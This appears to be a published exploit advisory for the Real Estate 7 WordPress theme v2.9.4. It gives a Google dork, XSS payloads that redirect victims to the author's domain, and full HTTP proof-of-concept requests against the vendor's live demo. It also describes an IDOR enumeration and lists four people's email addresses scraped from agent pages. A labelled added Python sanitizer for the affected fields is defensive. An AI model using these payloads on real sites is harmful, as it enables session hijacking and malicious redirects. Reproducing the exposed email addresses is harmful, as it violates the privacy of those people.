# Exploit Title: Real Estate 7 WordPress v2.9.4 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/realestate-7/
# Date: 12/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://contempothemes.com/
# Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
# Version: 2.9.4
# Tested on: Kali Linux
# CVE: -
# CWE: 79, 200, 319
----[]- Info: -[]----
Demo website: https://contempothemes.com/wp-real-estate-7/elementor-demo/
Demo account #1: agent/agent (login/password)
PoC Profile #0: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/m0ze-m0ze/
PoC Profile #1: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/agent-demo/
----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
PoC: https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword&ct_city=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E&ct_state&ct_zipcode&search-listings=true&ct_property_type&ct_ct_status&ct_beds_plus&ct_baths_plus&ct_community&ct_country&ct_mls&ct_rental_guests&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&lat&lng
----[]- Persistent XSS -> Agent Profile: -[]----
Any cookie-stealing payload can be stored here to hijack a user or administrator session, or to force a redirect to a malicious website. Vulnerable textarea: «Agent Testimonials» (the «Show on Agents Page» checkbox must be enabled).
Payload Sample: <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
PoC:
POST /wp-real-estate-7/minimal-demo/account-settings/ HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17074317185520
Content-Length: 3843
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/account-settings/
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1
-----------------------------17074317185520
Content-Disposition: form-data; name="first_name"
Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="last_name"
Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="nickname"
agent
-----------------------------17074317185520
Content-Disposition: form-data; name="display_name"
Agent Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="user_url"
-----------------------------17074317185520
Content-Disposition: form-data; name="description"
-----------------------------17074317185520
Content-Disposition: form-data; name="twitterhandle"
#
-----------------------------17074317185520
Content-Disposition: form-data; name="facebookurl"
#
-----------------------------17074317185520
Content-Disposition: form-data; name="instagramurl"
#
-----------------------------17074317185520
Content-Disposition: form-data; name="linkedinurl"
#
-----------------------------17074317185520
Content-Disposition: form-data; name="youtubeurl"
#
-----------------------------17074317185520
Content-Disposition: form-data; name="isagent"
yes
-----------------------------17074317185520
Content-Disposition: form-data; name="agentorder"
-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_profile_img"; filename=""
Content-Type: application/octet-stream
-----------------------------17074317185520
Content-Disposition: form-data; name="mobile"
6195556589
-----------------------------17074317185520
Content-Disposition: form-data; name="fax"
6195556588
-----------------------------17074317185520
Content-Disposition: form-data; name="title"
Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="tagline"
Selling the Dream!
-----------------------------17074317185520
Content-Disposition: form-data; name="agentlicense"
123456
-----------------------------17074317185520
Content-Disposition: form-data; name="userTestimonial"
<img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_broker_logo"; filename=""
Content-Type: application/octet-stream
-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragename"
-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragelicense"
-----------------------------17074317185520
Content-Disposition: form-data; name="office"
6195553698
-----------------------------17074317185520
Content-Disposition: form-data; name="address"
101 Front St, Suite 100
-----------------------------17074317185520
Content-Disposition: form-data; name="city"
San Diego
-----------------------------17074317185520
Content-Disposition: form-data; name="state"
CA
-----------------------------17074317185520
Content-Disposition: form-data; name="postalcode"
92101
-----------------------------17074317185520
Content-Disposition: form-data; name="updateuser"
Update Profile
-----------------------------17074317185520
Content-Disposition: form-data; name="_wpnonce"
b2e5069987
-----------------------------17074317185520
Content-Disposition: form-data; name="_wp_http_referer"
/wp-real-estate-7/minimal-demo/account-settings/
-----------------------------17074317185520
Content-Disposition: form-data; name="action"
update-user
-----------------------------17074317185520--
----[]- Persistent Self-XSS -> Listing Email Alerts: -[]----
It is only self-XSS, but still worth noting.
Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
PoC:
POST /wp-real-estate-7/minimal-demo/wp-admin/admin-ajax.php HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 294
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/listing-email-alerts/
Cookie: _your_cookies_here_
ct_property_type=0&ct_ct_status=0&beds=&baths=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&pricefrom=&priceto=&ct_city=&ct_state=&zip=&ctea_alert_creation_nounce=3eebf51cdf&action=ct_alert_creation_save&ctea_email=agent%40somedomain.com
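Both stored issues above come down to form fields that reach the page without a server-side policy: the «Agent Testimonials» textarea (userTestimonial) and the numeric beds/baths fields of the alert form. The following is an added example, not code from the Real Estate 7 theme, showing one way such a policy looks: rich-text fields go through an allowlist HTML sanitizer that keeps a few formatting tags and drops every event handler and script URL, numeric fields must match a format rule, and every other field is fully escaped. Field names are taken from the two PoC requests; the policy table, the allowlist and the sample submissions are constructed for this example.

```python
"""Server-side field policy for the profile and email-alert forms (added example,
not the theme's own code). Field names come from the PoC requests; the policy
table and sample submissions are constructed."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags a testimonial may keep and the attributes allowed on each. No event
# handler attribute is ever allowed, so <img src=x onerror=...> is dropped whole.
ALLOWED_TAGS = {"b": set(), "i": set(), "em": set(), "strong": set(),
                "p": set(), "br": set(), "a": {"href"}}
VOID_TAGS = {"br"}
SAFE_URL_SCHEMES = {"http", "https"}


class AllowlistSanitizer(HTMLParser):
    """Re-serialises input keeping only allowlisted tags; all text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped; its text content still arrives via handle_data
        kept = ""
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue
            if name == "href" and urlsplit(value).scheme.lower() not in SAFE_URL_SCHEMES:
                continue  # refuses javascript:, data: and relative links
            kept += f' {name}="{html.escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

    def result(self):
        self.close()
        return "".join(self.out)


def sanitize_rich_text(value):
    s = AllowlistSanitizer()
    s.feed(value)
    return s.result()


DIGITS = re.compile(r"\d{0,15}")
COUNT = re.compile(r"(?:\d{1,2}(?:\.5)?)?")   # beds/baths: blank, "3" or "2.5"
EMAIL = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")

# Per-field policy (constructed). Fields not listed fall back to plain text and
# are fully escaped, so a newly added form field can never land as live markup.
FIELD_RULES = {
    "userTestimonial": sanitize_rich_text,
    "mobile": DIGITS, "fax": DIGITS, "office": DIGITS,
    "beds": COUNT, "baths": COUNT,
    "ctea_email": EMAIL,
}


def sanitize_submission(form):
    """Returns (cleaned, rejected): cleaned values are safe to store and render in
    HTML text context; rejected lists fields that failed their format rule."""
    cleaned, rejected = {}, []
    for name, raw in form.items():
        rule = FIELD_RULES.get(name)
        if rule is None:
            cleaned[name] = html.escape(raw, quote=True)
        elif callable(rule):
            cleaned[name] = rule(raw)
        elif rule.fullmatch(raw):
            cleaned[name] = raw
        else:
            rejected.append(name)
    return cleaned, rejected


PAYLOAD = "<img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>"
SAMPLE_PROFILE = {   # constructed; field names from the account-settings PoC
    "first_name": "Agent <script>",
    "userTestimonial": "Great agent! " + PAYLOAD
                       + ' <b>Recommended</b> <a href="javascript:alert(1)">site</a>',
    "mobile": "6195556589",
}
SAMPLE_ALERT = {     # constructed; field names from the admin-ajax PoC
    "beds": "",
    "baths": '"><img src=x onerror=alert(`m0ze`);>',
    "ctea_email": "agent@somedomain.com",
}

if __name__ == "__main__":
    for form in (SAMPLE_PROFILE, SAMPLE_ALERT):
        print(sanitize_submission(form))
```

The testimonial keeps `<b>Recommended</b>` and a bare `<a>site</a>` (the javascript: href is removed) while the `<img onerror>` element disappears entirely; the baths value is rejected rather than cleaned, because a numeric field has no legitimate reason to carry markup. Note that escaped output is only correct for the HTML text context; a value echoed inside an attribute, as the reflected ct_city parameter is, needs attribute escaping at the output site as well.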
----[]- IDOR: -[]----
Iterating over this URL https://contempothemes.com/wp-real-estate-7/minimal-demo/?post_type=listings&p=XXXX with 1-4 digit values for the «p» parameter can lead to interesting results such as https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/ and https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/order-starter-2019-12-30-182042/ (revealing the package name, the order date and the unique login/author name as useful information).
----[]- Information Exposure: -[]----
Each agent profile page contains an «Email» link that triggers a pop-up form. That form contains a hidden input field holding the agent's unique email address, for example:
<input type="hidden" id="ctyouremail" name="ctyouremail" value="chris@contempographicdesign.com" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="adams@adamsgroup.website" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="alpiskris@hotmail.com" />
<input type="hidden" id="ctyouremail" name="ctyouremail" value="skyking1978@gmail.com" />
The same result can be achieved by viewing the source code of an agent profile page (it's faster to search the code for the «@» symbol from the bottom).